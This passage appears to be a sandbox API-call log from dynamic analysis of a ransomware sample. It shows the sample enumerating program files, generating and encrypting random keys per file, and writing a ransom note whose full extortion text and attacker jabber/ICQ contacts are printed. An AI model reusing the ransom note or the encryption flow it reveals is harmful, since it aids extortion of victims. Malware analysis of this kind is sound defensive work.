pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui") returned 69 [0251.059] StrStrIW (lpFirst="msdaremr.dll.mui", lpSrch=".horseleader") returned 0x0 [0251.059] lstrcmpW (lpString1="msdaremr.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0251.059] lstrcmpW (lpString1="msdaremr.dll.mui", lpString2="_uninstalling_.png") returned 1 [0251.059] lstrlenW (lpString=".testttjffg") returned 11 [0251.059] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui", lpSrch=".testttjffg") returned 0x0 [0251.059] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.059] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.059] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.059] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92b8e84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x92b8e84, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x7e1110, dwReserved1=0x99178095, cFileName="msdaremr.dll.mui", cAlternateFileName="")) returned 0 [0251.059] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.061] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\#Decrypt#.txt") returned 66 [0251.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.078] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation 
instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.078] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.080] lstrlenA (lpString="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") returned 1368 [0251.080] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.080] CloseHandle (hObject=0x158) returned 1 [0251.080] GetProcessHeap () returned 0x780000 [0251.080] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.080] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cac9e93, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0x2cac9e93, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0x2cac9e93, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x206, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="handler.reg", cAlternateFileName="")) returned 1 [0251.080] lstrcmpiW (lpString1="handler.reg", lpString2="Windows") returned -1 [0251.080] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg") returned 58 [0251.080] StrStrIW (lpFirst="handler.reg", lpSrch=".horseleader") returned 0x0 [0251.080] lstrcmpW (lpString1="handler.reg", lpString2="#Decrypt#.txt") returned 1 [0251.080] lstrcmpW (lpString1="handler.reg", lpString2="_uninstalling_.png") returned 1 [0251.080] lstrlenW (lpString=".testttjffg") returned 11 [0251.080] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\System\\msadc\\handler.reg", lpSrch=".testttjffg") returned 0x0 [0251.081] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.081] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.081] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handler.reg" (normalized: "c:\\program files\\common files\\system\\msadc\\handler.reg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.082] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70a4b8b3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70a4b8b3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x2d63e7d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x24c, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="handsafe.reg", cAlternateFileName="")) returned 1 [0251.082] lstrcmpiW (lpString1="handsafe.reg", lpString2="Windows") returned -1 [0251.082] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg") returned 59 [0251.082] StrStrIW (lpFirst="handsafe.reg", lpSrch=".horseleader") returned 0x0 [0251.082] lstrcmpW (lpString1="handsafe.reg", lpString2="#Decrypt#.txt") returned 1 [0251.083] lstrcmpW (lpString1="handsafe.reg", lpString2="_uninstalling_.png") returned 1 [0251.083] lstrlenW (lpString=".testttjffg") returned 11 [0251.083] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg", lpSrch=".testttjffg") returned 0x0 [0251.083] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.083] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.083] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg" (normalized: "c:\\program files\\common files\\system\\msadc\\handsafe.reg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.083] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b36a80d, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8b36a80d, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8b6180d2, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb7000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0251.083] lstrcmpiW (lpString1="msadce.dll", lpString2="Windows") returned -1 [0251.083] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll") returned 57 [0251.084] StrStrIW (lpFirst="msadce.dll", lpSrch=".horseleader") returned 0x0 [0251.084] lstrcmpW (lpString1="msadce.dll", lpString2="#Decrypt#.txt") returned 1 [0251.084] lstrcmpW (lpString1="msadce.dll", lpString2="_uninstalling_.png") returned 1 [0251.084] lstrlenW (lpString=".testttjffg") returned 11 [0251.084] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll", lpSrch=".testttjffg") returned 0x0 [0251.084] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.084] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.084] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.084] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc13c33e, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfc13c33e, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80e1eed0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadcer.dll", cAlternateFileName="")) returned 1 [0251.084] lstrcmpiW (lpString1="msadcer.dll", lpString2="Windows") returned -1 [0251.084] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll") returned 58 [0251.085] StrStrIW (lpFirst="msadcer.dll", lpSrch=".horseleader") returned 0x0 [0251.085] lstrcmpW (lpString1="msadcer.dll", lpString2="#Decrypt#.txt") returned 1 [0251.085] lstrcmpW (lpString1="msadcer.dll", lpString2="_uninstalling_.png") returned 1 [0251.085] lstrlenW (lpString=".testttjffg") returned 11 [0251.085] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll", lpSrch=".testttjffg") returned 0x0 [0251.085] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.085] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | 
out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.085] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.086] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9e4ffc, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a9e4ffc, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a9e4ffc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1c000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadcf.dll", cAlternateFileName="")) returned 1 [0251.087] lstrcmpiW (lpString1="msadcf.dll", lpString2="Windows") returned -1 [0251.087] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll") returned 57 [0251.087] StrStrIW (lpFirst="msadcf.dll", lpSrch=".horseleader") returned 0x0 [0251.087] lstrcmpW (lpString1="msadcf.dll", lpString2="#Decrypt#.txt") returned 1 [0251.087] lstrcmpW (lpString1="msadcf.dll", lpString2="_uninstalling_.png") returned 1 [0251.087] lstrlenW (lpString=".testttjffg") returned 11 [0251.087] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll", lpSrch=".testttjffg") returned 0x0 [0251.087] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.087] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.087] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.087] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbf732e2, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfbf732e2, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80e6a9c0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadcfr.dll", cAlternateFileName="")) returned 1 [0251.087] lstrcmpiW (lpString1="msadcfr.dll", lpString2="Windows") returned -1 [0251.087] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll") returned 58 [0251.088] StrStrIW (lpFirst="msadcfr.dll", lpSrch=".horseleader") returned 0x0 [0251.088] lstrcmpW (lpString1="msadcfr.dll", lpString2="#Decrypt#.txt") returned 1 [0251.088] lstrcmpW (lpString1="msadcfr.dll", lpString2="_uninstalling_.png") returned 1 [0251.088] lstrlenW (lpString=".testttjffg") returned 11 [0251.088] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll", lpSrch=".testttjffg") returned 0x0 [0251.088] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.088] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.088] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll" (normalized: "c:\\program 
files\\common files\\system\\msadc\\msadcfr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.088] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a9bee9c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a9bee9c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a9e4ffc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x3f000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadco.dll", cAlternateFileName="")) returned 1 [0251.088] lstrcmpiW (lpString1="msadco.dll", lpString2="Windows") returned -1 [0251.088] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll") returned 57 [0251.088] StrStrIW (lpFirst="msadco.dll", lpSrch=".horseleader") returned 0x0 [0251.089] lstrcmpW (lpString1="msadco.dll", lpString2="#Decrypt#.txt") returned 1 [0251.089] lstrcmpW (lpString1="msadco.dll", lpString2="_uninstalling_.png") returned 1 [0251.089] lstrlenW (lpString=".testttjffg") returned 11 [0251.089] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll", lpSrch=".testttjffg") returned 0x0 [0251.089] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.089] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.089] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.089] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc0a3dca, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfc0a3dca, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80edd5b0, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadcor.dll", cAlternateFileName="")) returned 1 [0251.089] lstrcmpiW (lpString1="msadcor.dll", lpString2="Windows") returned -1 [0251.089] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll") returned 58 [0251.089] StrStrIW (lpFirst="msadcor.dll", lpSrch=".horseleader") returned 0x0 [0251.089] lstrcmpW (lpString1="msadcor.dll", lpString2="#Decrypt#.txt") returned 1 [0251.089] lstrcmpW (lpString1="msadcor.dll", lpString2="_uninstalling_.png") returned 1 [0251.090] lstrlenW (lpString=".testttjffg") returned 11 [0251.090] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll", lpSrch=".testttjffg") returned 0x0 [0251.090] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.090] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0xffffffff [0251.091] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84872aa8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x84872aa8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x84872aa8, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadcs.dll", cAlternateFileName="")) returned 1 [0251.091] lstrcmpiW (lpString1="msadcs.dll", lpString2="Windows") returned -1 [0251.091] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll") returned 57 [0251.091] StrStrIW (lpFirst="msadcs.dll", lpSrch=".horseleader") returned 0x0 [0251.091] lstrcmpW (lpString1="msadcs.dll", lpString2="#Decrypt#.txt") returned 1 [0251.091] lstrcmpW (lpString1="msadcs.dll", lpString2="_uninstalling_.png") returned 1 [0251.091] lstrlenW (lpString=".testttjffg") returned 11 [0251.091] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll", lpSrch=".testttjffg") returned 0x0 [0251.091] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.091] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.091] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.092] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: 
lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3801e6, ftCreationTime.dwHighDateTime=0x1ca041a, ftLastAccessTime.dwLowDateTime=0xc3801e6, ftLastAccessTime.dwHighDateTime=0x1ca041a, ftLastWriteTime.dwLowDateTime=0x345eeb10, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x4a000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msadds.dll", cAlternateFileName="")) returned 1 [0251.092] lstrcmpiW (lpString1="msadds.dll", lpString2="Windows") returned -1 [0251.092] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll") returned 57 [0251.092] StrStrIW (lpFirst="msadds.dll", lpSrch=".horseleader") returned 0x0 [0251.092] lstrcmpW (lpString1="msadds.dll", lpString2="#Decrypt#.txt") returned 1 [0251.092] lstrcmpW (lpString1="msadds.dll", lpString2="_uninstalling_.png") returned 1 [0251.092] lstrlenW (lpString=".testttjffg") returned 11 [0251.092] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll", lpSrch=".testttjffg") returned 0x0 [0251.092] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.092] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.092] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.092] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfce53b36, 
ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfce53b36, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x80fc2d90, ftLastWriteTime.dwHighDateTime=0x1ca0422, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msaddsr.dll", cAlternateFileName="")) returned 1 [0251.093] lstrcmpiW (lpString1="msaddsr.dll", lpString2="Windows") returned -1 [0251.093] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll") returned 58 [0251.093] StrStrIW (lpFirst="msaddsr.dll", lpSrch=".horseleader") returned 0x0 [0251.093] lstrcmpW (lpString1="msaddsr.dll", lpString2="#Decrypt#.txt") returned 1 [0251.093] lstrcmpW (lpString1="msaddsr.dll", lpString2="_uninstalling_.png") returned 1 [0251.093] lstrlenW (lpString=".testttjffg") returned 11 [0251.093] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll", lpSrch=".testttjffg") returned 0x0 [0251.093] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.093] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.093] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.093] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd7d9276, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0xfd7d9276, 
